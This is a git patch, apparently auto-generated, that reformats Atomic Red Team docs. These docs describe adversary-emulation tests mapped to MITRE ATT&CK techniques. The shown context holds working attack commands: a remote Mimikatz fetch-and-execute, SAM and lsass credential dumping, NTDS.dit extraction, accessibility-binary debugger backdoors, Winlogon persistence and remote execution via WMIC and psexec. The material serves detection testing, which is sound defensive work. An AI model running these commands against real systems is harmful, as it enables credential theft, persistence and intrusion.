From 75c332ac528e48d360f6dcfdbfbb258bc7ba6baf Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 29 Aug 2019 22:18:28 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1002/T1002.md | 15 +++++-------- atomics/T1003/T1003.md | 30 +++++++++----------------- atomics/T1004/T1004.md | 9 +++----- atomics/T1005/T1005.md | 3 +-- atomics/T1007/T1007.md | 6 ++---- atomics/T1009/T1009.md | 3 +-- atomics/T1010/T1010.md | 3 +-- atomics/T1012/T1012.md | 3 +-- atomics/T1014/T1014.md | 9 +++----- atomics/T1015/T1015.md | 21 ++++++------------ atomics/T1016/T1016.md | 6 ++---- atomics/T1018/T1018.md | 15 +++++-------- atomics/T1022/T1022.md | 12 ++++------- atomics/T1027/T1027.md | 3 +-- atomics/T1028/T1028.md | 15 +++++-------- atomics/T1030/T1030.md | 3 +-- atomics/T1031/T1031.md | 3 +-- atomics/T1033/T1033.md | 6 ++---- atomics/T1035/T1035.md | 3 +-- atomics/T1036/T1036.md | 6 ++---- atomics/T1037/T1037.md | 6 ++---- atomics/T1040/T1040.md | 12 ++++------- atomics/T1042/T1042.md | 3 +-- atomics/T1046/T1046.md | 6 ++---- atomics/T1047/T1047.md | 12 ++++------- atomics/T1048/T1048.md | 12 ++++------- atomics/T1049/T1049.md | 9 +++----- atomics/T1050/T1050.md | 6 ++---- atomics/T1053/T1053.md | 9 +++----- atomics/T1055/T1055.md | 12 ++++------- atomics/T1056/T1056.md | 3 +-- atomics/T1057/T1057.md | 3 +-- atomics/T1059/T1059.md | 3 +-- atomics/T1060/T1060.md | 12 ++++------- atomics/T1062/T1062.md | 3 +-- atomics/T1063/T1063.md | 12 ++++------- atomics/T1064/T1064.md | 3 +-- atomics/T1065/T1065.md | 6 ++---- atomics/T1069/T1069.md | 9 +++----- atomics/T1070/T1070.md | 15 +++++-------- atomics/T1071/T1071.md | 15 +++++-------- atomics/T1074/T1074.md | 6 ++---- atomics/T1075/T1075.md | 3 +-- atomics/T1076/T1076.md | 3 +-- atomics/T1077/T1077.md | 6 ++---- atomics/T1081/T1081.md | 12 ++++------- atomics/T1082/T1082.md | 15 +++++-------- atomics/T1083/T1083.md | 12 ++++------- atomics/T1084/T1084.md | 6 ++---- atomics/T1085/T1085.md | 3 +-- atomics/T1086/T1086.md | 36 +++++++++++-------------------- atomics/T1087/T1087.md | 33 ++++++++++------------------- atomics/T1088/T1088.md | 12 ++++------- atomics/T1089/T1089.md | 30 +++++++++----------------- atomics/T1090/T1090.md | 3 +-- atomics/T1096/T1096.md | 3 +-- atomics/T1097/T1097.md | 3 +-- atomics/T1098/T1098.md | 3 +-- atomics/T1099/T1099.md | 21 ++++++------------ atomics/T1100/T1100.md | 3 +-- atomics/T1101/T1101.md | 3 +-- atomics/T1103/T1103.md | 3 +-- atomics/T1105/T1105.md | 27 ++++++++---------------- atomics/T1107/T1107.md | 36 +++++++++++-------------------- atomics/T1110/T1110.md | 3 +-- atomics/T1112/T1112.md | 9 +++----- atomics/T1113/T1113.md | 12 ++++------- atomics/T1114/T1114.md | 3 +-- atomics/T1115/T1115.md | 6 ++---- atomics/T1117/T1117.md | 9 +++----- atomics/T1118/T1118.md | 6 ++---- atomics/T1119/T1119.md | 6 ++---- atomics/T1121/T1121.md | 6 ++---- atomics/T1122/T1122.md | 3 +-- atomics/T1123/T1123.md | 6 ++---- atomics/T1124/T1124.md | 6 ++---- atomics/T1126/T1126.md | 9 +++----- atomics/T1127/T1127.md | 3 +-- atomics/T1128/T1128.md | 3 +-- atomics/T1130/T1130.md | 3 +-- atomics/T1132/T1132.md | 3 +-- atomics/T1134/T1134.md | 3 +-- atomics/T1135/T1135.md | 9 +++----- atomics/T1136/T1136.md | 15 +++++-------- atomics/T1137/T1137.md | 3 +-- atomics/T1138/T1138.md | 3 +-- atomics/T1139/T1139.md | 3 +-- atomics/T1140/T1140.md | 6 ++---- atomics/T1141/T1141.md | 6 ++---- atomics/T1142/T1142.md | 3 +-- atomics/T1144/T1144.md | 3 +-- atomics/T1145/T1145.md | 12 ++++------- atomics/T1146/T1146.md | 18 ++++++---------- atomics/T1147/T1147.md | 3 +-- atomics/T1148/T1148.md | 6 ++---- atomics/T1150/T1150.md | 3 +-- atomics/T1151/T1151.md | 3 +-- atomics/T1152/T1152.md | 3 +-- atomics/T1153/T1153.md | 6 ++---- atomics/T1154/T1154.md | 3 +-- atomics/T1155/T1155.md | 3 +-- atomics/T1156/T1156.md | 6 ++---- atomics/T1158/T1158.md | 36 +++++++++++-------------------- atomics/T1159/T1159.md | 3 +-- atomics/T1160/T1160.md | 3 +-- atomics/T1163/T1163.md | 3 +-- atomics/T1164/T1164.md | 6 ++---- atomics/T1165/T1165.md | 6 ++---- atomics/T1166/T1166.md | 9 +++----- atomics/T1168/T1168.md | 9 +++----- atomics/T1169/T1169.md | 3 +-- atomics/T1170/T1170.md | 3 +-- atomics/T1173/T1173.md | 3 +-- atomics/T1174/T1174.md | 3 +-- atomics/T1176/T1176.md | 9 +++----- atomics/T1179/T1179.md | 3 +-- atomics/T1180/T1180.md | 3 +-- atomics/T1183/T1183.md | 6 ++---- atomics/T1191/T1191.md | 6 ++---- atomics/T1193/T1193.md | 3 +-- atomics/T1196/T1196.md | 3 +-- atomics/T1197/T1197.md | 9 +++----- atomics/T1201/T1201.md | 21 ++++++------------ atomics/T1202/T1202.md | 6 ++---- atomics/T1206/T1206.md | 6 ++---- atomics/T1207/T1207.md | 3 +-- atomics/T1214/T1214.md | 3 +-- atomics/T1216/T1216.md | 3 +-- atomics/T1217/T1217.md | 6 ++---- atomics/T1218/T1218.md | 9 +++----- atomics/T1220/T1220.md | 12 ++++------- atomics/T1222/T1222.md | 48 ++++++++++++++---------------------------- atomics/T1223/T1223.md | 6 ++---- atomics/T1482/T1482.md | 6 ++---- atomics/T1485/T1485.md | 15 +++++-------- atomics/T1489/T1489.md | 9 +++----- atomics/T1490/T1490.md | 12 ++++------- atomics/T1496/T1496.md | 3 +-- atomics/T1501/T1501.md | 6 ++---- atomics/index.yaml | 2 ++ 140 files changed, 384 insertions(+), 764 deletions(-) diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 956d1344..0288b4a2 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file | Path that should be compressed into our output file | Path | C:\*| | output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ```
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file | Path that should be compressed into our output file | Path | *.docx| | output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` rar a -r #{output_file} #{input_file} ```
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*| | output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` zip #{output_file} #{input_files} ```
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` gzip -f #{input_file} ```
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file_folder | Path that should be compressed | Path | /tmp/victim-files/| | output_file | File that should be output | Path | /tmp/victim-files.tar.gz| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` tar -cvzf #{output_file} #{input_file_folder} ```
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 768817ec..fe0820f5 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ```
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` gsecdump -a ```
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/ |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | output.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wce -o #{output_file} ```
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security @@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` procdump.exe -accepteula -ma lsass.exe #{output_file} ```
@@ -249,8 +244,7 @@ Manager and administrative permissions. **Supported Platforms:** Windows -#### Run it with these steps! -1. Open Task Manager: +#### Run it with these steps! 1. Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager". @@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. |------|-------------|------|---------------| | input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| -#### Run it with these steps! -1. Open Mimikatz: +#### Run it with these steps! 1. Open Mimikatz: Execute `mimikatz` at a command prompt. 2. Select a Memory Dump: @@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication. |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q ```
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` vssadmin.exe create shadow /for=#{drive_letter} ```
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller. | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Extract| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md index 01b4d876..0a497269 100644 --- a/atomics/T1004/T1004.md +++ b/atomics/T1004/T1004.md @@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ```
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ```
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force ``` diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md index 52e7c770..5256f06a 100644 --- a/atomics/T1005/T1005.md +++ b/atomics/T1005/T1005.md @@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index ebad1753..3c5471b8 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -22,8 +22,7 @@ Identify system services |------|-------------|------|---------------| | service_name | Name of service to start stop, query | string | svchost.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` tasklist.exe sc query sc query state= all @@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net.exe start >> #{output_file} ```
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index 2362559e..532af8e9 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ```
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 0d45205c..d2a68afc 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr | input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | T1010.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} ``` diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 02ee4fc5..5ceb2028 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 560a570f..62cff54e 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo insmod #{rootkit_file} ```
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo modprobe #{rootkit_file} ```
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment |------|-------------|------|---------------| | driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` puppetstrings #{driver_path} ```
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index 07be8405..f692fd90 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -48,8 +48,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | osk.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | sethc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | utilman.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | magnify.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | narrator.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | atbroker.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index e883ea7d..e48be6ac 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -17,8 +17,7 @@ Identify network configuration information **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` ipconfig /all netsh interface show arp -a @@ -34,8 +33,7 @@ Identify network configuration information **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index c0e5d778..ed10dabd 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -35,8 +35,7 @@ Identify remote systems with net.exe **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net view /domain net view ``` @@ -49,8 +48,7 @@ Identify remote systems via ping sweep **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ```
@@ -62,8 +60,7 @@ Identify remote systems via arp **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` arp -a ```
@@ -75,8 +72,7 @@ Identify remote systems via arp **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` arp -a | grep -v '^?' ```
@@ -88,8 +84,7 @@ Identify remote systems via ping sweep **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ```
diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 93c58c81..82a3d4c0 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -23,8 +23,7 @@ Encrypt data for exiltration **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo "This file will be encrypted" > /tmp/victim-gpg.txt mkdir /tmp/victim-files cd /tmp/victim-files @@ -44,8 +43,7 @@ rar a -p"blue" hello.rar (VARIANT) **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mkdir ./tmp/victim-files cd ./tmp/victim-files echo "This file will be encrypted" > ./encrypted_file.txt @@ -62,8 +60,7 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT) **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` path=%path%;"C:\Program Files (x86)\winzip" mkdir ./tmp/victim-files cd ./tmp/victim-files @@ -80,8 +77,7 @@ Note: Requires 7zip installation **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mkdir ./tmp/victim-files cd ./tmp/victim-files echo "This file will be encrypted" > ./encrypted_file.txt diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 00975b3b..94f3e137 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -23,8 +23,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh chmod +x /tmp/art.sh diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 46137e06..1926fa0a 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -23,8 +23,7 @@ Powershell Enable WinRM **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Enable-PSRemoting -Force ```
@@ -45,8 +44,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio |------|-------------|------|---------------| | computer_name | Name of Computer | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ```
@@ -65,8 +63,7 @@ Utilize WMIC to start remote process | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ```
@@ -85,8 +82,7 @@ Utilize psexec to start remote process | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` psexec \\host -u domain\user -p password -s cmd.exe ```
@@ -104,8 +100,7 @@ Execute Invoke-command on remote host | host_name | Remote Windows Host Name | String | Test| | remote_command | Command to execute on remote Host | String | ipconfig| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}} ```
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 75ec66b6..d101540e 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -15,8 +15,7 @@ Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 split -b 5000000 /tmp/victim-whole-file diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md index 121ab272..4ebe169d 100644 --- a/atomics/T1031/T1031.md +++ b/atomics/T1031/T1031.md @@ -20,8 +20,7 @@ and will then revert the binPath change, restoring Fax to its original state. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index d8513de8..a6fa0b62 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -32,8 +32,7 @@ Identify System owner or users on an endpoint |------|-------------|------|---------------| | computer_name | Name of remote computer | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"#{computer_name}" @@ -52,8 +51,7 @@ Identify System owner or users on an endpoint **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` users w who diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md index d3c5c675..7cb247e6 100644 --- a/atomics/T1035/T1035.md +++ b/atomics/T1035/T1035.md @@ -21,8 +21,7 @@ Creates a service specifying an aribrary command and executes it. When executing | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} sc.exe delete #{service_name} diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index 1860baed..de06418b 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -31,8 +31,7 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe ``` @@ -45,8 +44,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cp /bin/sh /tmp/crond /tmp/crond ``` diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md index b1cf6169..65f9f38f 100644 --- a/atomics/T1037/T1037.md +++ b/atomics/T1037/T1037.md @@ -30,8 +30,7 @@ Added Via Reg.exe |------|-------------|------|---------------| | script_command | Command To Execute | String | cmd.exe /c calc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}" ```
@@ -43,8 +42,7 @@ Mac logon script **Supported Platforms:** macOS -#### Run it with these steps! -1. Create the required plist file +#### Run it with these steps! 1. Create the required plist file sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index 5f97548d..3c55520d 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -30,8 +30,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -49,8 +48,7 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -69,8 +67,7 @@ installed, along with WinPCAP. Windump will require the windump executable. |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe ``` @@ -89,8 +86,7 @@ installed, along with WinPCAP. Windump will require the windump executable. |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | 